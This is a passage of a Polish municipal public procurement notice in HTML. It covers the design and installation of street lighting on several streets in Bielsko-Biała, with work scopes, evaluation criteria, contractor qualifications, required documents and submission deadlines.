zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wykonanie instalacji oświetlenia ulicznego wraz <br/>z dokumentacją budowlano-wykonawczą na ulicy Małej Straconki 98, Józefa Sowińskiego, Jaskrowej, Romańskiej, Zdrowej w Bielsku-Białej.<br/><br/>2.	Zakres robót obejmuje w szczególności: <br/>CZĘŚĆ IV – ulica Romańska<br/>1)	W oparciu o program funkcjonalno-użytkowy należy opracować dokumentację projektową oraz wykonać instalacje oświetleniową. Planowane parametry zakresu prac: <br/>a)	linia napowietrzna o przekroju 4x25 mm2 – około 345 m<br/>b)	linia kablowa o przekroju 4x25 mm2 – około 55 m <br/>c)	słupy betonowe E10,5 – około 10 szt.<br/>d)	oprawy LED z zabezpieczeniami, wyposażone w gniazda ZHAGA – około 10 szt. <br/>o parametrach określonych w programie funkcjonalno-użytkowym punkt 2.1. <br/>Oprawy nie mogą generować mocy biernej pojemnościowej.<br/>2)	Szczegółowy opis przedmiotu zamówienia zawierają załączniki: program funkcjonalno-użytkowy oraz tabela elementów rozliczeniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wykonanie instalacji oświetlenia ulicznego wraz z dokumentacją budowlano-wykonawczą na ulicy Małej Straconki 98, Józefa Sowińskiego, Jaskrowej, Romańskiej, Zdrowej w Bielsku-Białej.<br/><br/>2.	Zakres robót obejmuje w szczególności: <br/>CZĘŚĆ V – ulica Zdrowa<br/>1)	W oparciu o program funkcjonalno-użytkowy należy opracować dokumentację projektową oraz wykonać instalacje oświetleniową. Planowane parametry zakresu prac: <br/>a)	linia napowietrzna o przekroju 4x25 mm2 – około 265 m <br/>b)	słupy betonowe E10,5 – około 7 szt.<br/>c)	oprawy LED z zabezpieczeniami, wyposażone w gniazda ZHAGA – około 7 szt. <br/>o parametrach określonych w programie funkcjonalno-użytkowym punkt 2.1. <br/>Oprawy nie mogą generować mocy biernej pojemnościowej. <br/>2)	Szczegółowy opis przedmiotu zamówienia zawierają załączniki: program funkcjonalno-użytkowy oraz tabela elementów rozliczeniowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 112 ustawy Pzp, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki dotyczące: <br/><br/>1.	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3.	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4.	Zdolności technicznej lub zawodowej:<br/>Zamawiający stawia następujące warunki w powyższym zakresie: O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki dotyczące zdolności technicznej i zawodowej:<br/><br/>I.	Część 1 postępowania: <br/><br/>1)	Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie <br/>dwóch (2) robót budowlanych o wartości nie mniejszej niż 10 000,00 zł brutto każda, polegających na wykonaniu instalacji oświetlenia ulic i/lub placów i/lub parkingów itp. <br/>Roboty te winny być wykonane należycie.<br/><br/>2)	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, <br/>tj. jedną (1) osobą, która będzie uczestniczyć w realizacji zamówienia, posiadającą uprawnienia budowlane w branży elektro-energetycznej (do kierowania robotami), lub odpowiadające <br/>im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>II.	Część 2 postępowania: <br/><br/>1)	Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie <br/>dwóch (2) robót budowlanych o wartości nie mniejszej niż 10 000,00 zł brutto każda, polegających na wykonaniu instalacji oświetlenia ulic i/lub placów i/lub parkingów itp. <br/>Roboty te winny być wykonane należycie.<br/><br/>2)	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, <br/>tj. jedną (1) osobą, która będzie uczestniczyć w realizacji zamówienia, posiadającą uprawnienia budowlane w branży elektro-energetycznej (do kierowania robotami), lub odpowiadające <br/>im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>III.	Część 3 postępowania:<br/><br/>1)	Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie <br/>dwóch (2) robót budowlanych o wartości nie mniejszej niż 10 000,00 zł brutto każda, polegających na wykonaniu instalacji oświetlenia ulic i/lub placów i/lub parkingów itp. <br/>Roboty te winny być wykonane należycie.<br/><br/>2)	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, <br/>tj. jedną (1) osobą, która będzie uczestniczyć w realizacji zamówienia, posiadającą uprawnienia budowlane w branży elektro-energetycznej (do kierowania robotami), lub odpowiadające <br/>im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>IV.	Część 4 postępowania:<br/><br/>1)	Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie <br/>dwóch (2) robót budowlanych o wartości nie mniejszej niż 10 000,00 zł brutto każda, polegających na wykonaniu instalacji oświetlenia ulic i/lub placów i/lub parkingów itp. <br/>Roboty te winny być wykonane należycie.<br/><br/>2)	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, <br/>tj. jedną (1) osobą, która będzie uczestniczyć w realizacji zamówienia, posiadającą uprawnienia budowlane w branży elektro-energetycznej (do kierowania robotami), lub odpowiadające <br/>im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>V.	Część 5 postępowania:<br/><br/>1)	Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie <br/>dwóch (2) robót budowlanych o wartości nie mniejszej niż 10 000,00 zł brutto każda, polegających na wykonaniu instalacji oświetlenia ulic i/lub placów i/lub parkingów itp. <br/>Roboty te winny być wykonane należycie.<br/><br/>2)	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, <br/>tj. jedną (1) osobą, która będzie uczestniczyć w realizacji zamówienia, posiadającą uprawnienia budowlane w branży elektro-energetycznej (do kierowania robotami), lub odpowiadające <br/>im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>Uwagi dla Części 1 - 5 postępowania:<br/>a)	Jeżeli zakres robót przedstawionych w dokumencie złożonym na potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej <br/>i prawidłowo ukończone jest szerszy od powyżej określonego przez Zamawiającego, należy <br/>w wykazie robót budowlanych, podać zakres robót odpowiadających zakresowi warunku.<br/>b)	Wartości podane w dokumentach składanych wraz z ofertą, w walutach innych niż złote polskie (PLN), należy przeliczyć wg średniego kursu waluty ogłoszonego przez NBP na dzień wystawienia dokumentu.<br/>c)	Zamawiający może uznać, na każdym etapie postępowania, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>d)	Uprawnienia budowlane, o których mowa powyżej, powinny być zgodne z ustawą Prawo budowlane oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 6 maja 2019 r. <br/>w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie lub wcześniej obowiązujących przepisów;<br/>e)	Zamawiający uzna za właściwe uprawnienia osób posiadających odpowiednie kwalifikacje zawodowe zdobyte w innych państwach, na zasadach określonych w art. 12a ww. ustawy, <br/>z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>f)	Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany jest dostarczyć Zamawiającemu, niezwłocznie po zawarciu umowy, dokumenty w formie kserokopii potwierdzonej „za zgodność z oryginałem”, tj. kopię uprawnień budowlanych kierownika budowy.<br/>g)	Zamawiający dopuszcza, aby Wykonawca w razie wykazywania spełnienia warunku udziału w postępowaniu dla więcej niż jednej części postępowania posłużył się wykazaniem tych samych robót budowlanych;<br/>h)	Zamawiający dopuszcza, aby Wykonawca w razie wykazywania spełnienia warunku udziału w postępowaniu dla więcej niż jednej części postępowania wskazał tą samą osobę która będzie uczestniczyć w realizacji zamówienia, posiadającą uprawnienia budowlane w branży elektro-energetycznej (do kierowania robotami), lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Wykonawca zobowiązany jest złożyć następujące dokumenty:<br/>1)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz: <br/>2)	Załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>a)	Okres wyrażony w latach, o którym mowa powyżej w pkt 1), liczy się wstecz od dnia, w którym upływa termin składania ofert w postępowaniu.<br/>b)	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowalnych wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w pkt 1) dotyczy robót, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń okresowych lub ciągłych, w których wykonaniu bezpośrednio uczestniczył lub uczestniczy.<br/>c)	W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje, bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert.<br/>3)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>a)	W Wykazie osób należy wskazać osobę, spełniającą warunek udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych,<br/>w przypadku gdy Wykonawca powoła się w ofercie na rozwiązania równoważne. W takiej sytuacji, zobowiązany jest<br/>dołączyć do oferty odpowiednie dokumenty (w języku polskim), np. karty techniczne, karty katalogowe producenta,<br/>wymagane przepisami prawa certyfikaty, inne dokumenty, opisujące techniczne parametry zaoferowanych materiałów i<br/>urządzeń równoważnych, lub/oraz inne dokumenty (w języku polskim) dotyczące norm, europejskich ocen technicznych,<br/>aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa ustawie Pzp, odnoszące się do<br/>rozwiązań równoważnych, pozwalające jednoznacznie stwierdzić,<br/>że spełniają one wymagania i parametry określone przez Zamawiającego w SWZ i jej załącznikach. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych, o ile wymaga<br/>ich złożenia wraz z ofertą, a Wykonawca ich nie złożył, bądź złożone środki dowodowe<br/>są niekompletne, tj. ww. odpowiednie dokumenty (w języku polskim), np. karty techniczne, karty katalogowe producenta,<br/>wymagane przepisami prawa certyfikaty, inne dokumenty, opisujące techniczne parametry zaoferowanych materiałów i<br/>urządzeń równoważnych, lub/oraz inne dokumenty (w języku polskim) dotyczące norm, europejskich ocen technicznych,<br/>aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa ustawie Pzp, odnoszące się do<br/>rozwiązań równoważnych, pozwalające jednoznacznie stwierdzić, że spełniają one wymagania i parametry określone przez<br/>Zamawiającego w SWZ i jej załącznikach. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta przetargowa; Ofertę należy sporządzić na formularzu Oferta, Ofertę należy wypełnić podając wymaganie informacje w tym m. in.: <br/>a.	Informację o zastosowaniu materiałów i urządzeń równoważnych, lub/oraz rozwiązań równoważnych;<br/>b.	Oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>c.	Tabela elementów rozliczeniowych - Wycena zamówienia będąca integralną częścią Formularza oferta. <br/>Tabelę elementów rozliczeniowych – Wycenę zam należy wypełnić we wszystkich wymaganych pozycjach. Oferta Wyk który nie poda ww. informacji zostanie odrzucona przez Zamawiającego, na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp, jako oferta, której treść jest niezgodna z warunkami zamówienia. <br/>d.	Informacje w zakresie Harmonogramu prac - Zam wymaga od Wyk zadeklarowania terminu zakończenia prac związanych z realizacją zamówienia wskazanych w punktach 1-4 Harmonogramu prac dla poszczególnych części postępowania. <br/>W przypadku braku zadekl przez Wyk któregokolwiek terminu zakończenia prac związanych z realizacją zamówienia wskazanych w punktach 1-4 Harmonogramów prac dla poszczególnych części postepowania Zam uzna, że Wykonawca wykona prace w maksymalnych terminach określonych przez Zam.<br/>e.	Inne istotne informacje.<br/>2. Przedmiotowe środki dowodowe tj.:<br/>a. Dok dotyczące oferowanych materiałów i urządzeń równoważnych, lub/oraz rozwiązań równoważnych, np. karty<br/>techniczne, karty katalogowe producenta, wymagane przepisami prawa certyfikaty, inne dokumenty, opisujące techniczne<br/>parametry zaoferowanych materiałów i urządzeń równoważnych, lub/oraz inne dokumenty dotyczące norm, europejskich<br/>ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, odnoszących się do rozwiązań<br/>równoważnych, podanych w tabeli na końcu formularza Oferta, pozwalające jednoznacznie stwierdzić, że spełniają one<br/>wymagania i parametry określone przez Zam w SWZ i jej załącznikach (m.in. przedmiarach robót i dokumentacji<br/>projektowej) – będą one stanowić załączniki do oferty – w przypadku zastosowania przez Wykonawcę materiałów i urządzeń<br/>równoważnych, lub/oraz rozwiązań równoważnych podczas realizacji zamówienia.<br/>3. Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125<br/>ust. 1 ustawy Pzp, stanowiące dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu,<br/>o których mowa w Części X SWZ, na dzień składania ofert, tymczasowo zastępujący wymagane przez Zam podmiotowe<br/>środki dowodowe. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa<br/>powyżej w ppkt. 4, składa każdy z Wyk.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa powyżej w ppkt. 4, także ww. oświadczenie podmiotu udostępniającego zasoby,<br/>4. Upoważnienie (pełnomocnictwo), lub inny dokument, potwierdzający umocowanie do reprezentowania Wyk (podpisania<br/>oferty), o ile nie wynika ono z dokumentów rejestrowych Wykonawcy. Powyższy zapis stosuje się odpowiednio do osoby<br/>działającej<br/>w imieniu Wyk wspólnie ubiegających się o udzielenie zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby Wyk.<br/>5. Pełnomocnictwo (w oryginale), do reprezentowania Wyk ubiegających się wspólnie (konsorcja, spółki cywilne) o<br/>przedmiotowe zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez<br/>wszystkich Wyk ubiegających się wspólnie o zamówienie).<br/>6. Zobowiązanie podmiotu udostępniającego zasoby, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie / pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. <br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć na formularzu Oferta.<br/>4.	Przepisy ustawy Pzp dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w formularzu Oferta, należy wpisać jako Wykonawcę wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ze wskazaniem Lidera, czyli Wykonawcę, który będzie posiadał pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz Partnerów, czyli pozostałych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, których będzie reprezentował Lider.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają (wraz z ofertą) pełnomocnictwo do reprezentowania Wykonawców ubiegających się wspólnie (konsorcjum, spółka cywilna) o przedmiotowe zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia).<br/>7.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia publicznego.<br/>8.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu.<br/>9.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z nich winien potwierdzić brak podstaw wykluczenia z udziału w postępowaniu.<br/>10.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>11.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (jeżeli takie jest wymagane przez Zamawiającego).<br/>12.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 Pzp oraz wskazanym we Wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej: https://um-bielsko.logintrade.net/zapytania_email,191278,aafa97ecf2b7e9f1f6e822455a90c17f.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-19 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin rozpoczęcia prac: niezwłocznie po zawarciu umowy.<br/>2.	Termin zakończenia prac objętych umową: Do 40 tygodni = 280 dni (w ogłoszeniu nie ma możliwości wpisania okresu realizacji zamówienia w tygodniach) od daty podpisania umowy, nie dłużej jednak niż do 19.12.2025 r., z zastrzeżeniem terminów określonych w harmonogramie prac.<br/>3.	Szczegółowe informacje dotyczące terminu realizacji zamówienia zawarte są we wzorach umów.<br/>4. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy<br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (Dz.U. poz. 835). Do Wykonawcy podlegającego wykluczeniu w tym<br/>zakresie, stosuje się art. 7 